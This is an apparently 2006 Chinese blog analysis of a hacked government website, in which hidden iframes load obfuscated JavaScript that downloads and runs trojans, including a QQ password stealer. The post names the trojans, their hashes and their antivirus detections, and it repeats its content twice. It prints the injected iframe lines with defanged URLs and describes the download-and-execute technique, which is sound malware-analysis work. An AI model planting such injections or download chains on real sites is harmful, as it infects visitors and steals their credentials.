下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站
2006-12-01 21:09
363 查看
endurer 原创
2006-12-01 第1版
网页首部被加入两段代码:
代码段1:
/---------
<iframe height=0 width=0 src="hxxp://ip-ie.www***113.cnidc.cn/w***m/"></iframe>
----------/
w***m.htm的内容为的内容为 escape( ) 加密的代码,解密后的内容为 JavaScript 脚本程序,利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/111.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
代码段2:
/---------
<iframe height=0 width=0 src="hxxp://www.z***zy***qr.com.**/f***j/wm**.htm/"></iframe>
----------/
wm**.htm 的内容为 escape( ) 加密的代码,解密后的内容为一段 JavaScript脚本程序,也是利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/game/fj.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
fj.exe 采用 Borland Delphi Setup Module 制作,
/---------
获取文件版本信息大小失败!
创建时间 : 2006-12-1 20:42:53
大小 : 15872 字节 15.512 KB
MD5 : 945db5a79cf5e1a0cf097cbb30af858e
---------/
Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm。
fj.exe 会从同一网站下载下列文件:
1)/mc/bao/fujia.exe
,采用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 制作,
/---------
大小 : 39069 字节 38.157 KB
MD5 : 9ac6f3cb5741973297c2be2b282f19b9
---------/
Kaspersky 报为 Trojan-PSW.Win32.QQPass.ra。
2)/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳。
/---------
语言 : 中文(中国)
文件版本 : 0.00.0191
说明 :
版权 :
备注 :
产品版本 : 0.00.0191
产品名称 : bw34eSg
公司名称 : bw34eSg
合法商标 :
内部名称 : vj9we8r
源文件名 : vj9we8r.exe
大小 : 44217 字节 43.185 KB
MD5 : 9934b38446510bf7518207a0da22631c
---------/
3)/mc/gezi.exe
未能获取,可能是灰鸽子
4)/mc/dabao.exe
未能获取
5)/mc/xbao.exe
未能获取
保存为C:/Program Files/Common Files下的
1.exe
2.exe
3.exe
4.exe
5.exe
2006-12-01 第1版
网页首部被加入两段代码:
代码段1:
/---------
<iframe height=0 width=0 src="hxxp://ip-ie.www***113.cnidc.cn/w***m/"></iframe>
----------/
w***m.htm的内容为的内容为 escape( ) 加密的代码,解密后的内容为 JavaScript 脚本程序,利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/111.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
代码段2:
/---------
<iframe height=0 width=0 src="hxxp://www.z***zy***qr.com.**/f***j/wm**.htm/"></iframe>
----------/
wm**.htm 的内容为 escape( ) 加密的代码,解密后的内容为一段 JavaScript脚本程序,也是利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/game/fj.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
fj.exe 采用 Borland Delphi Setup Module 制作,
/---------
获取文件版本信息大小失败!
创建时间 : 2006-12-1 20:42:53
大小 : 15872 字节 15.512 KB
MD5 : 945db5a79cf5e1a0cf097cbb30af858e
---------/
Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm。
fj.exe 会从同一网站下载下列文件:
1)/mc/bao/fujia.exe
,采用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 制作,
/---------
大小 : 39069 字节 38.157 KB
MD5 : 9ac6f3cb5741973297c2be2b282f19b9
---------/
Kaspersky 报为 Trojan-PSW.Win32.QQPass.ra。
2)/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳。
/---------
语言 : 中文(中国)
文件版本 : 0.00.0191
说明 :
版权 :
备注 :
产品版本 : 0.00.0191
产品名称 : bw34eSg
公司名称 : bw34eSg
合法商标 :
内部名称 : vj9we8r
源文件名 : vj9we8r.exe
大小 : 44217 字节 43.185 KB
MD5 : 9934b38446510bf7518207a0da22631c
---------/
3)/mc/gezi.exe
未能获取,可能是灰鸽子
4)/mc/dabao.exe
未能获取
5)/mc/xbao.exe
未能获取
保存为C:/Program Files/Common Files下的
1.exe
2.exe
3.exe
4.exe
5.exe
相关文章推荐
- 两个会自动下载恶意程序文件的政府网站
- 两个下载恶意程序文件的政府网站换花样了
- 一个会下载 Trojan.DL.Agent.wzr 的政府网站
- 又一个下载恶意文件的政府网站
- 隆重介绍 - MSDN中文网站Webcast下载程序
- 站长助手-网站web在线管理程序 v1.0 下载
- delphi做的idhttp下载具体某个网站资源的程序(希望大家多看看,多给小弟指点指点,有利于小弟学习)
- 一个被挂上木马Trojan-Dropper.MSWord.Lafool.i的政府网站
- IT男写恶意程序获利超3000元,3万多QQ中招偷偷下载软件
- php的网站程序备份源码下载
- 织梦程序做的网站,会员下载的弹窗问题
- [07-01-06]打开某IT技术问答网站时自动下载文件sinze.exe/Trojan-Dropper.Win32.Agent.awq
- 分享常见网站的爬虫程序下载地址[微信|微博|企信|知乎|优酷|京东]
- 一个利用python从中科大音乐网站下载mp3的程序
- 织梦模板下载:政府供销社类部门织梦网站模板
- 又一个自动下载病毒的政府网站(第3版)
- 在WinForm程序中下载网站中的文件
- 分享常见网站的爬虫程序下载地址[微信|微博|企信|知乎|优酷|京东]
- 一些下载程序的网站